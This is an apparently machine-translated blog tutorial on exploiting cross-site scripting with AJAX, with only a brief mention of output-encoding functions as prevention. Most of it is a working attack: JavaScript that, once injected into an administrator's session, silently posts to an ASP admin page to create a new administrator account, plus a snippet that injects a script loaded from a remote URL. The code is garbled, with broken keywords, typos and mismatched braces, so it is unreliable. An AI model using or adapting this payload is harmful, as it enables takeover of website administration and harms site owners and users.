Use and prevention of ajax cross-site Vulnerabilities

By lonely

Let's talk about how to prevent cross-site attacks: In ASP, you can use the HTMLEncode function to prevent them, while in PHP, you can use htmlspecialchars; in ASP. NET can be used: HTMLEncode; the so-called cross-site, that is, because the filtering of website programs is not strict, the front-end can be affected by the construction of special statements to the background database; Use the illusion that the Administrator is fooled; below, introduce AJAX;

AJAX (Asynchronous JAVASCRIPT and XML) is a development technology used to create interactive web applications. It can achieve no refreshing page effects, or write XSS WORMl

To exploit this vulnerability, you must first find variables that are not strictly filtered, and then use JAVASCRIPT hijacking to execute the data we constructed. Use AJAX to simulate and submit data to achieve our goal. Of course, we need to capture packets for analysis first, and use winsock expert; similar to some CSRF;

Winsock expert mainly focuses on the submission address and some variables we need;

AJAX code:

Var request = false;

If (window. XMLHttpRequest ){

Request = new XMLHttpRequest ();

If (request. overrideMimeType ){

Request. overrideMimeType (text/xml );

}

} Else if (window. AcitveXObject ){

Var versions = [Microsoft. XMLHTTP, MSXML. XMHTTP, Microsoft. XMLHTTP,

Msxml2.XMLHTTP7.0, Msxml2.XMLHTTP. 6.0, Msxml2.XMLHTTP. 5.0, Msxml2.XMLHTTP. 4.0,

MSXML2.XMLHTTP. 3.0, MSXML2.XMLHTTP];

For (var I = 0; I <versions. length; I ++ ){

Try {request = new ActiveXObject (versions [I]);} catch (e ){}

}

}

Xmlhttp = request; // defines the XMLHTTPREQUEST object;

_ Add (); // execute the add administrator function;

Function _ add (){

Var url = "/admin/adminuser/adminuser_add.asp"

// Target website www.2cto.com;

Var myusername = "cnryan ";

Var mypassword1 = "cnryan ";

Var mypassword2 = "cnyan ";

Var params = "username =" + myusername + "& password1 =" + mypassword1 + "& password2 =" + mypassword2 +

"Purview = url ";

Xmlhttp. open ("POST", url, true );

// Enable asynchronous data transmission;

Xmlhttp. setRequestHeader ("content-length", params. length );

Xmlhttp. setRequestHeader ("content-type", "application/x-www-form-urlencode ");

Xmlhttp. setRequestHeader ("connection", "close ");

Xmlhttp. send (params); // use the POST method to send data asynchronously;

 

 

}

}

 

 

 

}

We can use the remote JS Loading Method: <script> var s = docuemnt. createElement ("script"); s. src = "url/ajax. js; document. body. appendChild (s) "; </script>